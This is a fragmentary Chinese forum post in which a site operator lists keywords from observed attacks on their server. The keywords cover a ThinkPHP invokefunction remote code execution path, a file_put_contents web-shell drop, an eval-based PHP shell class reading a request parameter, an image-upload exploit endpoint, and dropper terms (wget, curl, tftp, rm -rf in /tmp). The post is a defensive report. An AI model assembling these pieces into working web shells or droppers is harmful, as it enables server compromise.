如需移除,請網站管理者移除.
回覆
s
index/ hinkapp/invokefunction
function
call_user_func_array
vars
cdn-src-ip
x-forwarded-for
file_put_contents
dmlws.php
GaM10fA5
eval
這是一種典型的攻擊手法,利用了目標伺服器的漏洞或弱點,透過遠端執行惡意程式碼來取得對伺服器的控制權。
/wxapp.php?controller=Goods.doPageUpload
user-agent
multipart/form-data
------WebKitFormBoundary8UaANmWAgM4BqBSs
form-data
upfile
diguo.php
$H7mu6
new GaM10fA5($_REQUEST['123'])
123
IP是CDN位址,應該是想透過本站上傳帶有PHP代碼的圖片,本站有一些功能允許用戶上傳圖片或視頻,應該用這個方法來上傳。
Re: php class GaM10fA5 { public function __construct($H7mu6){ @eval(
binarys
server_ip
binout
exec
rm -rf $binout
$arch
wget
curl
tftp
status
cd
/tmp
/var
/dev